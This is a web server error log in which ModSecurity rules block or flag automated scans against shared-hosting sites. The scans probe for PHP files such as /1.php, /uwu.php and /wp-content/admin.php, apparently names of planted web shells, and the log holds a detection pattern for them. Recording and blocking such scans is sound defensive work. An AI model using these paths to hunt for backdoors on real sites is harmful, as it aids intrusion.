[Tue May 26 19:01:45.839992 2026] [security2:error] [pid 1045635:tid 1045769] [client 20.151.130.61:31354] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/1.php"] [unique_id "ahWgwRhDcQXYr7SS5sUYXwAAAAQ"]
[Tue May 26 19:01:45.840099 2026] [security2:error] [pid 1045635:tid 1045769] [client 20.151.130.61:31354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/1.php"] [unique_id "ahWgwRhDcQXYr7SS5sUYXwAAAAQ"]
[Tue May 26 19:01:45.840329 2026] [security2:error] [pid 1045635:tid 1045769] [client 20.151.130.61:31354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/1.php"] [unique_id "ahWgwRhDcQXYr7SS5sUYXwAAAAQ"]
[Tue May 26 19:01:46.559141 2026] [security2:error] [pid 1045635:tid 1045686] [remote 153.122.170.42:49466] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.170.122.153.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWgwhhDcQXYr7SS5sUYcwAAFzI"]
[Tue May 26 19:01:46.787487 2026] [security2:error] [pid 1045635:tid 1045886] [client 20.206.111.203:5075] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahWgwhhDcQXYr7SS5sUYfwAAAHk"]
[Tue May 26 19:01:46.787588 2026] [security2:error] [pid 1045635:tid 1045886] [client 20.206.111.203:5075] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahWgwhhDcQXYr7SS5sUYfwAAAHk"]
[Tue May 26 19:01:46.830709 2026] [security2:error] [pid 1045635:tid 1045795] [client 20.151.130.61:38343] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/100.php"] [unique_id "ahWgwhhDcQXYr7SS5sUYgAAAAB4"]
[Tue May 26 19:01:46.830817 2026] [security2:error] [pid 1045635:tid 1045795] [client 20.151.130.61:38343] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/100.php"] [unique_id "ahWgwhhDcQXYr7SS5sUYgAAAAB4"]
[Tue May 26 19:01:46.841088 2026] [security2:error] [pid 1045635:tid 1045826] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgwhhDcQXYr7SS5sUYdgAAAD0"]
[Tue May 26 19:01:47.694736 2026] [security2:error] [pid 1045635:tid 1045840] [client 20.151.130.61:19596] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahWgwxhDcQXYr7SS5sUYlAAAAEs"]
[Tue May 26 19:01:47.694836 2026] [security2:error] [pid 1045635:tid 1045840] [client 20.151.130.61:19596] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahWgwxhDcQXYr7SS5sUYlAAAAEs"]
[Tue May 26 19:01:48.199341 2026] [security2:error] [pid 1045635:tid 1045792] [client 14.228.244.89:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgwxhDcQXYr7SS5sUYnQAAABs"]
[Tue May 26 19:01:48.258881 2026] [security2:error] [pid 1045635:tid 1045879] [client 20.151.130.61:57739] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahWgxBhDcQXYr7SS5sUYpwAAAHI"]
[Tue May 26 19:01:48.258991 2026] [security2:error] [pid 1045635:tid 1045879] [client 20.151.130.61:57739] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahWgxBhDcQXYr7SS5sUYpwAAAHI"]
[Tue May 26 19:01:48.540511 2026] [security2:error] [pid 1045635:tid 1045864] [client 20.206.111.203:4553] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/bob.php"] [unique_id "ahWgxBhDcQXYr7SS5sUYrgAAAGM"]
[Tue May 26 19:01:48.540619 2026] [security2:error] [pid 1045635:tid 1045864] [client 20.206.111.203:4553] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/bob.php"] [unique_id "ahWgxBhDcQXYr7SS5sUYrgAAAGM"]
[Tue May 26 19:01:48.741553 2026] [security2:error] [pid 1045635:tid 1045838] [client 20.151.130.61:19449] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/edit.php"] [unique_id "ahWgxBhDcQXYr7SS5sUYsgAAAEk"]
[Tue May 26 19:01:48.741676 2026] [security2:error] [pid 1045635:tid 1045838] [client 20.151.130.61:19449] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/edit.php"] [unique_id "ahWgxBhDcQXYr7SS5sUYsgAAAEk"]
[Tue May 26 19:01:49.047363 2026] [security2:error] [pid 1045635:tid 1045808] [client 20.151.130.61:38360] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-content/admin.php"] [unique_id "ahWgxRhDcQXYr7SS5sUYtwAAACs"]
[Tue May 26 19:01:49.047520 2026] [security2:error] [pid 1045635:tid 1045808] [client 20.151.130.61:38360] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-content/admin.php"] [unique_id "ahWgxRhDcQXYr7SS5sUYtwAAACs"]
[Tue May 26 19:01:49.254218 2026] [security2:error] [pid 1045635:tid 1045837] [client 20.151.130.61:31319] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/f6.php"] [unique_id "ahWgxRhDcQXYr7SS5sUYvgAAAEg"]
[Tue May 26 19:01:49.254367 2026] [security2:error] [pid 1045635:tid 1045837] [client 20.151.130.61:31319] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/f6.php"] [unique_id "ahWgxRhDcQXYr7SS5sUYvgAAAEg"]
[Tue May 26 19:01:49.574960 2026] [security2:error] [pid 1045635:tid 1045765] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgxRhDcQXYr7SS5sUYvQAAAAA"]
[Tue May 26 19:01:49.589255 2026] [security2:error] [pid 1045635:tid 1045852] [client 20.151.130.61:19432] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahWgxRhDcQXYr7SS5sUYxgAAAFc"]
[Tue May 26 19:01:49.589382 2026] [security2:error] [pid 1045635:tid 1045852] [client 20.151.130.61:19432] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahWgxRhDcQXYr7SS5sUYxgAAAFc"]
[Tue May 26 19:01:49.645744 2026] [security2:error] [pid 1045635:tid 1045863] [client 20.206.111.203:5056] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/t3s.php"] [unique_id "ahWgxRhDcQXYr7SS5sUYyQAAAGI"]
[Tue May 26 19:01:49.645846 2026] [security2:error] [pid 1045635:tid 1045863] [client 20.206.111.203:5056] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/t3s.php"] [unique_id "ahWgxRhDcQXYr7SS5sUYyQAAAGI"]
[Tue May 26 19:01:50.128567 2026] [security2:error] [pid 1045635:tid 1045771] [client 20.151.130.61:38393] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/av.php"] [unique_id "ahWgxhhDcQXYr7SS5sUY1AAAAAY"]
[Tue May 26 19:01:50.128715 2026] [security2:error] [pid 1045635:tid 1045771] [client 20.151.130.61:38393] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/av.php"] [unique_id "ahWgxhhDcQXYr7SS5sUY1AAAAAY"]
[Tue May 26 19:01:50.538598 2026] [security2:error] [pid 1045635:tid 1045865] [client 20.151.130.61:19442] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/classwithtostring.php"] [unique_id "ahWgxhhDcQXYr7SS5sUY3wAAAGQ"]
[Tue May 26 19:01:50.538723 2026] [security2:error] [pid 1045635:tid 1045865] [client 20.151.130.61:19442] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/classwithtostring.php"] [unique_id "ahWgxhhDcQXYr7SS5sUY3wAAAGQ"]
[Tue May 26 19:01:50.597518 2026] [security2:error] [pid 1045635:tid 1045842] [client 20.206.111.203:5098] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/wp-admin/css/"] [unique_id "ahWgxhhDcQXYr7SS5sUY4AAAAE0"]
[Tue May 26 19:01:50.858029 2026] [security2:error] [pid 1045635:tid 1045880] [client 20.151.130.61:19414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-content/themes/index.php"] [unique_id "ahWgxhhDcQXYr7SS5sUY5AAAAHM"]
[Tue May 26 19:01:50.858158 2026] [security2:error] [pid 1045635:tid 1045880] [client 20.151.130.61:19414] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-content/themes/index.php"] [unique_id "ahWgxhhDcQXYr7SS5sUY5AAAAHM"]
[Tue May 26 19:01:51.235258 2026] [security2:error] [pid 1045635:tid 1045847] [client 20.151.130.61:19584] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-blog.php"] [unique_id "ahWgxxhDcQXYr7SS5sUY8gAAAFI"]
[Tue May 26 19:01:51.235374 2026] [security2:error] [pid 1045635:tid 1045847] [client 20.151.130.61:19584] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-blog.php"] [unique_id "ahWgxxhDcQXYr7SS5sUY8gAAAFI"]
[Tue May 26 19:01:51.474257 2026] [security2:error] [pid 1045635:tid 1045851] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgxxhDcQXYr7SS5sUY7QAAAFY"]
[Tue May 26 19:01:51.576588 2026] [security2:error] [pid 1045635:tid 1045812] [client 20.151.130.61:31328] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-includes/js/jquery/"] [unique_id "ahWgxxhDcQXYr7SS5sUY-QAAAC8"]
[Tue May 26 19:01:51.913732 2026] [security2:error] [pid 1045635:tid 1045832] [client 20.206.111.203:4560] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWgxxhDcQXYr7SS5sUZAwAAAEM"]
[Tue May 26 19:01:52.109896 2026] [security2:error] [pid 1045635:tid 1045843] [client 20.206.111.203:5098] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/x/"] [unique_id "ahWgyBhDcQXYr7SS5sUZCgAAAE4"]
[Tue May 26 19:01:52.181201 2026] [security2:error] [pid 1045635:tid 1045858] [client 20.151.130.61:31297] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWgyBhDcQXYr7SS5sUZCwAAAF0"]
[Tue May 26 19:01:52.257984 2026] [security2:error] [pid 1045635:tid 1045875] [client 20.151.130.61:31328] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-content/admin.php"] [unique_id "ahWgyBhDcQXYr7SS5sUZDwAAAG4"]
[Tue May 26 19:01:52.258096 2026] [security2:error] [pid 1045635:tid 1045875] [client 20.151.130.61:31328] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-content/admin.php"] [unique_id "ahWgyBhDcQXYr7SS5sUZDwAAAG4"]
[Tue May 26 19:01:52.292522 2026] [security2:error] [pid 1045635:tid 1045882] [client 20.206.111.203:4560] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWgyBhDcQXYr7SS5sUZEAAAAHU"]
[Tue May 26 19:01:52.497117 2026] [security2:error] [pid 1045635:tid 1045797] [client 20.206.111.203:5098] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/wp-admin/css/colors/modern/"] [unique_id "ahWgyBhDcQXYr7SS5sUZFAAAACA"]
[Tue May 26 19:01:52.884591 2026] [security2:error] [pid 1045635:tid 1045805] [client 20.206.111.203:4560] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWgyBhDcQXYr7SS5sUZHgAAACg"]
[Tue May 26 19:01:53.031552 2026] [security2:error] [pid 1045635:tid 1045880] [client 20.151.130.61:31300] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/adminfuns.php"] [unique_id "ahWgyRhDcQXYr7SS5sUZIgAAAHM"]
[Tue May 26 19:01:53.031703 2026] [security2:error] [pid 1045635:tid 1045880] [client 20.151.130.61:31300] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/adminfuns.php"] [unique_id "ahWgyRhDcQXYr7SS5sUZIgAAAHM"]
[Tue May 26 19:01:53.080883 2026] [security2:error] [pid 1045635:tid 1045814] [client 20.206.111.203:5098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/uwu.php"] [unique_id "ahWgyRhDcQXYr7SS5sUZJQAAADE"]
[Tue May 26 19:01:53.080992 2026] [security2:error] [pid 1045635:tid 1045814] [client 20.206.111.203:5098] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/uwu.php"] [unique_id "ahWgyRhDcQXYr7SS5sUZJQAAADE"]
[Tue May 26 19:01:53.221162 2026] [autoindex:error] [pid 1045635:tid 1045784] [client 3.15.216.38:0] AH01276: Cannot serve directory /home2/glorolle/public_html/juniorwoodies.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:01:53.616240 2026] [security2:error] [pid 1045635:tid 1045849] [client 20.206.111.203:4600] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/uwa.php"] [unique_id "ahWgyRhDcQXYr7SS5sUZQQAAAFQ"]
[Tue May 26 19:01:53.616406 2026] [security2:error] [pid 1045635:tid 1045849] [client 20.206.111.203:4600] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/uwa.php"] [unique_id "ahWgyRhDcQXYr7SS5sUZQQAAAFQ"]
[Tue May 26 19:01:53.888498 2026] [security2:error] [pid 1045635:tid 1045872] [client 20.151.130.61:19595] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/goods.php"] [unique_id "ahWgyRhDcQXYr7SS5sUZRQAAAGs"]
[Tue May 26 19:01:53.888590 2026] [security2:error] [pid 1045635:tid 1045872] [client 20.151.130.61:19595] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/goods.php"] [unique_id "ahWgyRhDcQXYr7SS5sUZRQAAAGs"]
[Tue May 26 19:01:53.954988 2026] [security2:error] [pid 1045635:tid 1045807] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgyRhDcQXYr7SS5sUZOgAAACo"]
[Tue May 26 19:01:54.222597 2026] [security2:error] [pid 1045635:tid 1045799] [client 20.206.111.203:4547] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/crgio.php"] [unique_id "ahWgyhhDcQXYr7SS5sUZTwAAACI"]
[Tue May 26 19:01:54.222782 2026] [security2:error] [pid 1045635:tid 1045799] [client 20.206.111.203:4547] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/crgio.php"] [unique_id "ahWgyhhDcQXYr7SS5sUZTwAAACI"]
[Tue May 26 19:01:54.391248 2026] [security2:error] [pid 1045635:tid 1045801] [client 20.151.130.61:38397] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/ms-edit.php"] [unique_id "ahWgyhhDcQXYr7SS5sUZUAAAACQ"]
[Tue May 26 19:01:54.391364 2026] [security2:error] [pid 1045635:tid 1045801] [client 20.151.130.61:38397] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/ms-edit.php"] [unique_id "ahWgyhhDcQXYr7SS5sUZUAAAACQ"]
[Tue May 26 19:01:55.167571 2026] [security2:error] [pid 1045635:tid 1045783] [client 23.191.200.12:42468] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "bosscoirs.com"] [uri "/wp-content/plugins/mojo-marketplace-wp-plugin/readme.txt"] [unique_id "ahWgyxhDcQXYr7SS5sUZagAAABI"]
